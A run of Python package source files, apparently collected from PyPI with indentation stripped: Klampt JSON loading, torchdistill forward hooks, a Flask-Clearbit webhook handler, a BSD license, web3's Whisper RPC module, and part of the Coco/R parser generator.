Not all objects are supported yet, notably geometry-related objects and
world entities.
Args:
jsonobj: A JSON structure (i.e., one coming from :func:`to_json`)
type (str, optional): the type of the object (see
:mod:`~klampt.model.types`). If 'auto' (default), the type of the
object is inferred automatically.
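Example (sketch; the dict mirrors what :func:`to_json` emits for a Trajectory):
>>> jsonobj = {'type':'Trajectory','times':[0,1],'milestones':[[0.0],[1.0]]}
>>> traj = from_json(jsonobj)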
"""
if type == 'auto':
if isinstance(jsonobj,(list,tuple)):
return jsonobj
elif isinstance(jsonobj,(bool,int,float,str)):
return jsonobj
elif isinstance(jsonobj,dict):
if 'type' in jsonobj:
type = jsonobj["type"]
elif 'times' in jsonobj and 'milestones' in jsonobj:
type = 'Trajectory'
elif 'x' in jsonobj and 'n' in jsonobj and 'kFriction' in jsonobj:
type = 'ContactPoint'
else:
raise TypeError("Unknown JSON object of type "+jsonobj.__class__.__name)
if type in ['Config','Configs','Vector','Matrix','Matrix3','Rotation','Value','IntArray','StringArray']:
return jsonobj
elif type == 'RigidTransform':
return jsonobj
elif type == 'ContactPoint':
return ContactPoint(jsonobj['x'],jsonobj['n'],jsonobj['kFriction'])
elif type == 'Trajectory' or type == 'LinearPath':
return Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'HermiteTrajectory':
return HermiteTrajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'SO3Trajectory':
return SO3Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'SE3Trajectory':
return SE3Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'IKObjective' or type == 'IKGoal':
link = jsonobj['link']
destlink = jsonobj['destLink'] if 'destLink' in jsonobj else -1
posConstraint = 'free'
rotConstraint = 'free'
localPosition = endPosition = None
direction = None
endRotation = None
localAxis = None
if 'posConstraint' in jsonobj:
posConstraint = jsonobj['posConstraint']
if 'rotConstraint' in jsonobj:
rotConstraint = jsonobj['rotConstraint']
if posConstraint == 'planar' or posConstraint == 'linear':
direction = jsonobj['direction']
if posConstraint != 'free':
localPosition = jsonobj['localPosition']
endPosition = jsonobj['endPosition']
if rotConstraint != 'free':
endRotation = jsonobj['endRotation']
if rotConstraint == 'axis' or rotConstraint == 'twoaxis':
localAxis = jsonobj['localAxis']
if posConstraint == 'free' and rotConstraint == 'free':
#empty
return IKObjective()
elif posConstraint != 'fixed':
raise NotImplementedError("Can't do non-fixed position constraints yet in Python API")
if rotConstraint == 'twoaxis':
raise NotImplementedError("twoaxis constraints are not implemented in Klampt")
if rotConstraint == 'free':
obj = IKObjective()
if destlink >= 0:
obj.setRelativePoint(link,destlink,localPosition,endPosition)
else:
obj.setFixedPoint(link,localPosition,endPosition)
return obj
elif rotConstraint == 'axis':
obj = IKObjective()
h = 0.1
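#approximate the axis constraint by pinning two points offset +/- h along the axis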
lpts = [vectorops.madd(localPosition,localAxis,-h),vectorops.madd(localPosition,localAxis,h)]
wpts = [vectorops.madd(endPosition,endRotation,-h),vectorops.madd(endPosition,endRotation,h)]
if destlink >= 0:
obj.setRelativePoints(link,destlink,lpts,wpts)
else:
obj.setFixedPoints(link,lpts,wpts)
return obj
elif rotConstraint == 'fixed':
obj = IKObjective()
R = so3.from_moment(endRotation)
t = vectorops.sub(endPosition,so3.apply(R,localPosition))
obj.setFixedTransform(link,R,t)
return obj
else:
raise ValueError("Invalid IK rotation constraint "+rotConstraint)
elif type == 'TriangleMesh':
inds = sum(jsonobj['indices'],[])
verts = sum(jsonobj['vertices'],[])
mesh = TriangleMesh()
mesh.indices.resize(len(inds))
mesh.vertices.resize(len(verts))
for i,v in enumerate(inds):
mesh.indices[i] = v
for i,v in enumerate(verts):
mesh.vertices[i] = v
return mesh
elif type == 'PointCloud':
pc = PointCloud()
verts = sum(jsonobj['vertices'],[])
pc.vertices.resize(len(verts))
for i,v in enumerate(verts):
pc.vertices[i] = v
if 'propertyNames' in jsonobj:
propNames = jsonobj['propertyNames']
pc.propertyNames.resize(len(propNames))
for i,v in enumerate(propNames):
pc.propertyNames[i] = v
if 'properties' in jsonobj:
props = sum(jsonobj['properties'],[])
pc.properties.resize(len(props))
for i,v in enumerate(props):
pc.properties[i] = v
#TODO: settings
return pc
elif type == 'VolumeGrid':
vg = VolumeGrid()
bbox = jsonobj['bmin'] + jsonobj['bmax']
vg.bbox.resize(6)
for i,v in enumerate(bbox):
vg.bbox[i] = v
vg.dims.resize(3)
for i,v in enumerate(jsonobj['dims']):
vg.dims[i] = v
values = jsonobj['values']
vg.values.resize(len(values))
for i,v in enumerate(values):
vg.values[i] = v
return vg
elif type == 'ConvexHull':
ch = ConvexHull()
points = sum(jsonobj['points'],[])
ch.points.resize(len(points))
for i,v in enumerate(points):
ch.points[i] = v
return ch
elif type == 'Geometry3D':
gtype = jsonobj['datatype']
if gtype == '':
return Geometry3D()
return Geometry3D(from_json(jsonobj['data'],gtype))
elif type in readers:
return read(type,jsonobj["data"])
else:
raise ValueError("Unknown or unsupported type "+type)
def _deprecated_func(oldName,newName):
import sys
mod = sys.modules[__name__]
f = getattr(mod,newName)
def depf(*args,**kwargs):
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(oldName,newName),DeprecationWarning)
return f(*args,**kwargs)
depf.__doc__ = 'Deprecated in a future version of Klampt. Use {} instead'.format(newName)
setattr(mod,oldName,depf)
_deprecated_func("filenameToType","filename_to_type")
_deprecated_func("filenameToTypes","filename_to_type")
_deprecated_func("toJson","to_json")
_deprecated_func("fromJson","from_json")
from collections import UserDict, UserList
class _DeprecatedDict(UserDict):
def __init__(self,oldname,newname,*args,**kwargs):
UserDict.__init__(self,*args,**kwargs)
self._oldname = oldname
self._newname = newname
self._warned = False
def __getitem__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserDict.__getitem__(self,key)
class _DeprecatedList(UserList):
def __init__(self,oldname,newname,*args,**kwargs):
UserList.__init__(self,*args,**kwargs)
self._oldname = oldname
self._newname = newname
self._warned = False
def __getitem__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserList.__getitem__(self,key)
def __contains__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserList.__contains__(self,key)
extensionToTypes = _DeprecatedDict("extensionToTypes","EXTENSION_TO_TYPES",EXTENSION_TO_TYPES)
typeToExtensions = _DeprecatedDict("typeToExtensions","TYPE_TO_EXTENSIONS",TYPE_TO_EXTENSIONS)
unsupportedJsonTypes = _DeprecatedList("unsupportedJsonTypes","UNSUPPORTED_JSON_TYPES",UNSUPPORTED_JSON_TYPES) | PypiClean |
/energon_prometheus_exporter_test-0.0.1-py3-none-any.whl/torchdistill-test/torchdistill/core/forward_hook.py | from collections import abc
import torch
# from torch._six import string_classes
from torch.nn.parallel.scatter_gather import gather
from torchdistill.common.module_util import check_if_wrapped, get_module
def get_device_index(data):
if isinstance(data, torch.Tensor):
device = data.device
return 'cpu' if device.type == 'cpu' else device.index
elif isinstance(data, abc.Mapping):
for key, data in data.items():
result = get_device_index(data)
if result is not None:
return result
elif isinstance(data, tuple):
for d in data:
result = get_device_index(d)
if result is not None:
return result
elif isinstance(data, abc.Sequence) and not isinstance(data, str):
for d in data:
result = get_device_index(d)
if result is not None:
return result
return None
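# Example behavior (illustrative): a tensor on cuda:1 found anywhere inside a
# nested dict/tuple/list yields 1, a CPU tensor yields 'cpu', and an input
# containing no tensors yields None.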
def register_forward_hook_with_dict(module, module_path, requires_input, requires_output, io_dict):
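    # Each hook below records data under io_dict[module_path]['input'|'output'][device_index];
    # keying by device lets ForwardHookManager.pop_io_dict gather results from
    # replicated modules (e.g. DataParallel) after the forward pass.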
io_dict[module_path] = dict()
def forward_hook4input(self, func_input, func_output):
if isinstance(func_input, tuple) and len(func_input) == 1:
func_input = func_input[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'input' not in sub_io_dict:
sub_io_dict['input'] = dict()
sub_io_dict['input'][device_index] = func_input
def forward_hook4output(self, func_input, func_output):
if isinstance(func_output, tuple) and len(func_output) == 1:
func_output = func_output[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'output' not in sub_io_dict:
sub_io_dict['output'] = dict()
sub_io_dict['output'][device_index] = func_output
def forward_hook4io(self, func_input, func_output):
if isinstance(func_input, tuple) and len(func_input) == 1:
func_input = func_input[0]
if isinstance(func_output, tuple) and len(func_output) == 1:
func_output = func_output[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'input' not in sub_io_dict:
sub_io_dict['input'] = dict()
if 'output' not in sub_io_dict:
sub_io_dict['output'] = dict()
sub_io_dict['input'][device_index] = func_input
sub_io_dict['output'][device_index] = func_output
if requires_input and not requires_output:
return module.register_forward_hook(forward_hook4input)
elif not requires_input and requires_output:
return module.register_forward_hook(forward_hook4output)
elif requires_input and requires_output:
return module.register_forward_hook(forward_hook4io)
raise ValueError('Either requires_input or requires_output should be True')
class ForwardHookManager(object):
"""
Example::
>>> import torch
>>> from torchvision import models
>>> from torchdistill.core.forward_hook import ForwardHookManager
>>> device = torch.device('cpu')
>>> forward_hook_manager = ForwardHookManager(device)
>>> model = models.resnet18()
>>> forward_hook_manager.add_hook(model, 'layer2')
>>> x = torch.rand(16, 3, 224, 224)
>>> y = model(x)
>>> io_dict = forward_hook_manager.pop_io_dict()
>>> layer2_input_tensor = io_dict['layer2']['input']
>>> layer2_output_tensor = io_dict['layer2']['output']
"""
def __init__(self, target_device):
self.target_device = torch.device(target_device) if isinstance(target_device, str) else target_device
self.uses_cuda = self.target_device.type == 'cuda'
self.io_dict = dict()
self.hook_list = list()
def add_hook(self, module, module_path, requires_input=True, requires_output=True):
unwrapped_module = module.module if check_if_wrapped(module) else module
sub_module = get_module(unwrapped_module, module_path)
handle = \
register_forward_hook_with_dict(sub_module, module_path, requires_input, requires_output, self.io_dict)
self.hook_list.append((module_path, handle))
def pop_io_dict(self):
gathered_io_dict = dict()
for module_path, module_io_dict in self.io_dict.items():
gathered_io_dict[module_path] = dict()
for io_type in list(module_io_dict.keys()):
sub_dict = module_io_dict.pop(io_type)
values = [sub_dict[key] for key in sorted(sub_dict.keys())]
gathered_obj = gather(values, self.target_device) if self.uses_cuda and len(values) > 1 else values[-1]
gathered_io_dict[module_path][io_type] = gathered_obj
return gathered_io_dict
def pop_io_dict_from_device(self, device):
device_io_dict = dict()
device_key = device.index if device.type == 'cuda' else device.type
for module_path, module_io_dict in self.io_dict.items():
device_io_dict[module_path] = dict()
for io_type in list(module_io_dict.keys()):
sub_dict = module_io_dict[io_type]
device_io_dict[module_path][io_type] = sub_dict.pop(device_key)
return device_io_dict
def change_target_device(self, target_device):
if self.target_device.type != target_device.type:
for sub_dict in self.io_dict.values():
sub_dict.clear()
self.target_device = target_device
def clear(self):
self.io_dict.clear()
for _, handle in self.hook_list:
handle.remove()
self.hook_list.clear() | PypiClean |
/Flask-Clearbit-0.1.0.tar.gz/Flask-Clearbit-0.1.0/flask_clearbit.py |
import hashlib
import hmac
import logging
import clearbit
import itsdangerous
from flask import Response, abort, request, url_for
from flask.signals import Namespace
from six.moves.http_client import BAD_REQUEST, OK
logger = logging.getLogger('Flask-Clearbit')
clearbit_result = Namespace().signal('clearbit.result')
class Clearbit(object):
"""
Flask-Clearbit
Documentation:
https://flask-clearbit.readthedocs.io
API:
https://clearbit.com/docs?python
:param app: Flask app to initialize with. Defaults to `None`
:param blueprint: Blueprint to attach the webhook handler to. Defaults to `None`
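Example (a minimal sketch; names are illustrative and the key is a placeholder):
>>> from flask import Flask, Blueprint
>>> app = Flask(__name__)
>>> app.config['CLEARBIT_KEY'] = 'sk_...'
>>> bp = Blueprint('hooks', __name__)
>>> clearbit = Clearbit(app, blueprint=bp)
>>> app.register_blueprint(bp, url_prefix='/webhooks')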
"""
api_key = None
blueprint = None
def __init__(self, app=None, blueprint=None):
if app is not None:
self.init_app(app, blueprint)
def init_app(self, app, blueprint=None):
self.api_key = api_key = app.config.get('CLEARBIT_KEY')
if api_key is None:
logger.warning('CLEARBIT_KEY not set')
return
clearbit.key = api_key
if blueprint is not None:
blueprint.add_url_rule('/clearbit', 'clearbit', self.handle_webhook, methods=['POST'])
self.blueprint = blueprint
def handle_webhook(self):
"""
https://clearbit.com/docs?python#webhooks
"""
request_signature = request.headers.get('x-request-signature')
if request_signature is None:
abort(BAD_REQUEST)
algorithm, signature = request_signature.split('=')
if not all((algorithm == 'sha1', signature)):
abort(BAD_REQUEST)
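# Recompute the HMAC-SHA1 of the raw request body with the API key and compare
# against the header value in constant time to avoid timing attacks.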
digest = hmac.new(self.api_key.encode(), request.data, hashlib.sha1).hexdigest()
if not itsdangerous.constant_time_compare(digest, signature):
abort(BAD_REQUEST)
clearbit_result.send(self, result=request.get_json())
return Response(status=OK)
@property
def webhook_url(self):
if self.blueprint is not None:
return url_for('.'.join((self.blueprint.name, 'clearbit')), _external=True)
def __getattr__(self, name):
return getattr(clearbit, name)
# EOF | PypiClean |
/MESSENGERuvvs-1.11.6.tar.gz/MESSENGERuvvs-1.11.6/docs/LICENSE.rst | *******
LICENSE
*******
Copyright (c) 2019, Matthew Burger
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| PypiClean |
/0x-web3-5.0.0a5.tar.gz/0x-web3-5.0.0a5/web3/shh.py | from web3._utils.filters import (
ShhFilter,
)
from web3.module import (
Module,
)
class Shh(Module):
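# Usage sketch (assumptions: `w3` is a Web3 instance whose connected node has
# Whisper enabled; the message fields follow the node's shh_post spec and are
# illustrative only):
#   key_id = w3.shh.newKeyPair()
#   w3.shh.post({'payload': '0x...', 'pubKey': w3.shh.getPublicKey(key_id), 'ttl': 60})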
@property
def version(self):
return self.web3.manager.request_blocking("shh_version", [])
@property
def info(self):
return self.web3.manager.request_blocking("shh_info", [])
def setMaxMessageSize(self, size):
return self.web3.manager.request_blocking("shh_setMaxMessageSize", [size])
def setMinPoW(self, min_pow):
return self.web3.manager.request_blocking("shh_setMinPoW", [min_pow])
def markTrustedPeer(self, enode):
return self.web3.manager.request_blocking("shh_markTrustedPeer", [enode])
def newKeyPair(self):
return self.web3.manager.request_blocking("shh_newKeyPair", [])
def addPrivateKey(self, key):
return self.web3.manager.request_blocking("shh_addPrivateKey", [key])
def deleteKeyPair(self, id):
return self.web3.manager.request_blocking("shh_deleteKeyPair", [id])
def hasKeyPair(self, id):
return self.web3.manager.request_blocking("shh_hasKeyPair", [id])
def getPublicKey(self, id):
return self.web3.manager.request_blocking("shh_getPublicKey", [id])
def getPrivateKey(self, id):
return self.web3.manager.request_blocking("shh_getPrivateKey", [id])
def newSymKey(self):
return self.web3.manager.request_blocking("shh_newSymKey", [])
def addSymKey(self, key):
return self.web3.manager.request_blocking("shh_addSymKey", [key])
def generateSymKeyFromPassword(self, password):
return self.web3.manager.request_blocking("shh_generateSymKeyFromPassword", [password])
def hasSymKey(self, id):
return self.web3.manager.request_blocking("shh_hasSymKey", [id])
def getSymKey(self, id):
return self.web3.manager.request_blocking("shh_getSymKey", [id])
def deleteSymKey(self, id):
return self.web3.manager.request_blocking("shh_deleteSymKey", [id])
def post(self, message):
if message and ("payload" in message):
return self.web3.manager.request_blocking("shh_post", [message])
else:
raise ValueError(
"message cannot be None or does not contain field 'payload'"
)
def newMessageFilter(self, criteria, poll_interval=None):
filter_id = self.web3.manager.request_blocking("shh_newMessageFilter", [criteria])
return ShhFilter(self.web3, filter_id, poll_interval=poll_interval)
def deleteMessageFilter(self, filter_id):
return self.web3.manager.request_blocking("shh_deleteMessageFilter", [filter_id])
def getMessages(self, filter_id):
return self.web3.manager.request_blocking("shh_getFilterMessages", [filter_id]) | PypiClean |
/CocoRPy27-1.4.1.zip/CocoRPy27-1.4.1/Parser.py |
from Errors import Errors
from CharClass import CharClass
from Core import Node
from Core import DFA
from Core import Graph
from Core import Symbol
from Core import Tab
from Core import Comment
from DriverGen import DriverGen
from ParserGen import ParserGen
import sys
from Scanner import Token
from Scanner import Scanner
from Scanner import Position
class Parser( object ):
_EOF = 0
_ident = 1
_number = 2
_string = 3
_badString = 4
# terminals
EOF_SYM = 0
ident_Sym = 1
number_Sym = 2
string_Sym = 3
badString_Sym = 4
COMPILER_Sym = 5
IGNORECASE_Sym = 6
CHARACTERS_Sym = 7
TOKENS_Sym = 8
NAMES_Sym = 9
PRAGMAS_Sym = 10
COMMENTS_Sym = 11
FROM_Sym = 12
TO_Sym = 13
NESTED_Sym = 14
IGNORE_Sym = 15
PRODUCTIONS_Sym = 16
equal_Sym = 17
point_Sym = 18
END_Sym = 19
plus_Sym = 20
minus_Sym = 21
pointpoint_Sym = 22
ANY_Sym = 23
CHR_Sym = 24
lparen_Sym = 25
rparen_Sym = 26
less_Sym = 27
uparrow_Sym = 28
out_Sym = 29
greater_Sym = 30
comma_Sym = 31
lesspoint_Sym = 32
pointgreater_Sym = 33
bar_Sym = 34
WEAK_Sym = 35
lbrack_Sym = 36
rbrack_Sym = 37
lbrace_Sym = 38
rbrace_Sym = 39
SYNC_Sym = 40
IF_Sym = 41
CONTEXT_Sym = 42
lparenpoint_Sym = 43
pointrparen_Sym = 44
from_Sym = 45
import_Sym = 46
star_Sym = 47
NOT_SYM = 48
# pragmas
ddtSym_Sym = 49
maxT = 48
_ddtSym = 49
T = True
x = False
minErrDist = 2
id = 0
str = 1
#-------------------------------------------------------------------------
def __init__( self ):
self.scanner = None
self.token = None # last recognized token
self.la = None # lookahead token
self.genScanner = False
self.tokenString = '' # used in declarations of literal tokens
self.noString = '-none-' # used in declarations of literal tokens
self.errDist = Parser.minErrDist
def getParsingPos( self ):
return self.la.line, self.la.col
def SynErr( self, errNum ):
if self.errDist >= Parser.minErrDist:
Errors.SynErr( errNum )
self.errDist = 0
def SemErr( self, msg ):
if self.errDist >= Parser.minErrDist:
Errors.SemErr( msg )
self.errDist = 0
def Warning( self, msg ):
if self.errDist >= Parser.minErrDist:
Errors.Warn( msg )
self.errDist = 0
def Successful( self ):
return Errors.count == 0;
def LexString( self ):
return self.token.val
def LookAheadString( self ):
return self.la.val
def Get( self ):
while True:
self.token = self.la
self.la = self.scanner.Scan( )
if self.la.kind <= Parser.maxT:
self.errDist += 1
break
if self.la.kind == Scanner.ddtSym_Sym:
self.la.val = '-' + str(self.la.val[1:])
Tab.parseArgs( [ self.la.val, 'filler1', 'filler2' ] )
self.la = self.token
def Expect( self, n ):
if self.la.kind == n:
self.Get( )
else:
self.SynErr( n )
def StartOf( self, s ):
return self.set[s][self.la.kind]
def ExpectWeak( self, n, follow ):
if self.la.kind == n:
self.Get( )
else:
self.SynErr( n )
while not self.StartOf(follow):
self.Get( )
def WeakSeparator( self, n, syFol, repFol ):
s = [ False for i in xrange( Parser.maxT+1 ) ]
if self.la.kind == n:
self.Get( )
return True
elif self.StartOf(repFol):
return False
else:
for i in xrange( Parser.maxT + 1 ):
s[i] = self.set[syFol][i] or self.set[repFol][i] or self.set[0][i]
self.SynErr( n )
while not s[self.la.kind]:
self.Get( )
return self.StartOf( syFol )
def Coco( self ):
g = Graph( )
g1 = Graph( )
g2 = Graph( )
s = set( )
if (self.la.kind == Scanner.from_Sym or self.la.kind == Scanner.import_Sym):
ParserGen.usingPos = self.Imports()
self.Expect(Scanner.COMPILER_Sym)
self.genScanner = True
Tab.ignored = set( )
self.Expect(Scanner.ident_Sym)
gramName = self.token.val
beg = self.la.pos
while self.StartOf(1):
self.Get()
Tab.semDeclPos = Position(self.scanner.buffer, beg, self.la.pos - beg, 0)
if (self.la.kind == Scanner.IGNORECASE_Sym):
self.Get( )
DFA.ignoreCase = True
if (self.la.kind == Scanner.CHARACTERS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym:
self.SetDecl()
if (self.la.kind == Scanner.TOKENS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
self.TokenDecl(Node.t)
if (self.la.kind == Scanner.NAMES_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym:
self.NameDecl()
if (self.la.kind == Scanner.PRAGMAS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
self.TokenDecl(Node.pr)
while self.la.kind == Scanner.COMMENTS_Sym:
self.Get( )
nested = False
self.Expect(Scanner.FROM_Sym)
g1 = self.TokenExpr()
self.Expect(Scanner.TO_Sym)
g2 = self.TokenExpr()
if (self.la.kind == Scanner.NESTED_Sym):
self.Get( )
nested = True
Comment(g1.l, g2.l, nested)
while self.la.kind == Scanner.IGNORE_Sym:
self.Get( )
s = self.Set()
Tab.ignored |= s # set union
while not (self.la.kind == Scanner.EOF_SYM or self.la.kind == Scanner.PRODUCTIONS_Sym):
self.SynErr(49)
self.Get()
self.Expect(Scanner.PRODUCTIONS_Sym)
if self.genScanner:
DFA.MakeDeterministic()
Graph.DeleteNodes()
while self.la.kind == Scanner.ident_Sym:
self.Get( )
sym = Symbol.Find(self.token.val)
undef = (sym is None)
if undef:
sym = Symbol(Node.nt, self.token.val, self.token.line)
else:
if sym.typ == Node.nt:
if sym.graph is not None:
self.SemErr("name declared twice")
else:
self.SemErr("this symbol kind not allowed on left side of production")
sym.line = self.token.line
noAttrs = (sym.attrPos is None)
sym.attrPos = None
noRet = (sym.retVar is None)
sym.retVar = None
if (self.la.kind == Scanner.less_Sym or self.la.kind == Scanner.lesspoint_Sym):
self.AttrDecl(sym)
if not undef:
if noAttrs != (sym.attrPos is None) or (noRet != (sym.retVar is None)):
self.SemErr("attribute mismatch between declaration and use of this symbol")
if (self.la.kind == Scanner.lparenpoint_Sym):
sym.semPos = self.SemText()
self.ExpectWeak(Scanner.equal_Sym, 2)
g = self.Expression()
sym.graph = g.l
Graph.Finish(g)
self.ExpectWeak(Scanner.point_Sym, 3)
self.Expect(Scanner.END_Sym)
self.Expect(Scanner.ident_Sym)
if gramName != self.token.val:
self.SemErr("name does not match grammar name")
Tab.gramSy = Symbol.Find(gramName)
if Tab.gramSy is None:
self.SemErr("missing production for grammar name")
else:
sym = Tab.gramSy
if sym.attrPos is not None:
self.SemErr("grammar symbol must not have attributes")
Tab.noSym = Symbol(Node.t, "???", 0) #noSym gets highest number
Tab.SetupAnys()
Tab.RenumberPragmas()
if Tab.ddt[2]:
Node.PrintNodes()
if Errors.count == 0:
sys.stdout.write( "checking\n" )
Tab.CompSymbolSets()
if Tab.ddt[7]:
Tab.XRef()
if Tab.GrammarOk():
if not Tab.ddt[9]:
sys.stdout.write( "parser" )
ParserGen.WriteParser(Tab.ddt[10])
if self.genScanner:
sys.stdout.write( " + scanner" )
DFA.WriteScanner(Tab.ddt[10])
if Tab.ddt[0]:
DFA.PrintStates()
if Tab.ddt[11]:
sys.stdout.write( " + driver" )
DriverGen.WriteDriver()
sys.stdout.write( " generated\n" )
if Tab.ddt[8]:
ParserGen.WriteStatistics()
if Tab.ddt[6]:
Tab.PrintSymbolTable()
self.Expect(Scanner.point_Sym)
def Imports( self ):
beg = None
pos = None
if (self.la.kind == Scanner.from_Sym):
self.Get( )
beg = self.token.pos
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.import_Sym)
if beg == None:
beg = self.token.pos
if self.la.kind == Scanner.ident_Sym:
self.Get( )
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.star_Sym:
self.Get( )
else:
self.SynErr(50)
while self.la.kind == Scanner.from_Sym or self.la.kind == Scanner.import_Sym:
if (self.la.kind == Scanner.from_Sym):
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Get( )
if self.la.kind == Scanner.ident_Sym:
self.Get( )
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.rparen_Sym)
else:
self.SynErr(51)
end = self.la.pos
pos = Position( self.scanner.buffer, beg, end - beg, 0 )
return pos
def SetDecl( self ):
self.Expect(Scanner.ident_Sym)
name = self.token.val
c = CharClass.Find(name)
if c is not None:
self.SemErr("name declared twice")
self.Expect(Scanner.equal_Sym)
s = self.Set()
if len(s) == 0:
self.SemErr("character set must not be empty")
c = CharClass(name, s)
self.Expect(Scanner.point_Sym)
def TokenDecl( self, typ ):
s = self.Sym()
name,kind = s
sym = Symbol.Find(name)
if sym is not None:
self.SemErr("name declared twice")
else:
sym = Symbol(typ, name, self.token.line)
sym.tokenKind = Symbol.fixedToken
self.tokenString = None
while not (self.StartOf(4)):
self.SynErr(52)
self.Get()
if self.la.kind == Scanner.equal_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.point_Sym)
if kind == self.str:
self.SemErr("a literal must not be declared with a structure")
Graph.Finish(g)
if (self.tokenString is None) or (self.tokenString == self.noString):
DFA.ConvertToStates(g.l, sym)
else: # TokenExpr is a single string
if Tab.literals.get(self.tokenString) is not None:
self.SemErr("token string declared twice")
Tab.literals[self.tokenString] = sym
DFA.MatchLiteral(self.tokenString, sym)
elif self.StartOf(5):
if kind == self.id:
self.genScanner = False
else:
DFA.MatchLiteral(sym.name, sym)
else:
self.SynErr(53)
if (self.la.kind == Scanner.lparenpoint_Sym):
sym.semPos = self.SemText()
if typ != Node.pr:
self.SemErr("semantic action not allowed here")
def NameDecl( self ):
self.Expect(Scanner.ident_Sym)
alias = self.token.val
self.Expect(Scanner.equal_Sym)
if self.la.kind == Scanner.ident_Sym:
self.Get( )
elif self.la.kind == Scanner.string_Sym:
self.Get( )
else:
self.SynErr(54)
Tab.NewName(alias, self.token.val)
self.Expect(Scanner.point_Sym)
def TokenExpr( self ):
g = self.TokenTerm()
first = True
while self.WeakSeparator(Scanner.bar_Sym, 6, 7):
g2 = self.TokenTerm()
if first:
Graph.MakeFirstAlt(g)
first = False
Graph.MakeAlternative(g, g2)
return g
def Set( self ):
s = self.SimSet()
while self.la.kind == Scanner.plus_Sym or self.la.kind == Scanner.minus_Sym:
if self.la.kind == Scanner.plus_Sym:
self.Get( )
s2 = self.SimSet()
s |= s2
else:
self.Get( )
s2 = self.SimSet()
s -= s2
return s
def AttrDecl( self, sym ):
if self.la.kind == Scanner.less_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(55)
self.Expect(Scanner.ident_Sym)
sym.retVar = self.token.val
if self.la.kind == Scanner.greater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(8):
if self.StartOf(9):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(56)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(11):
if self.StartOf(12):
self.Get()
else:
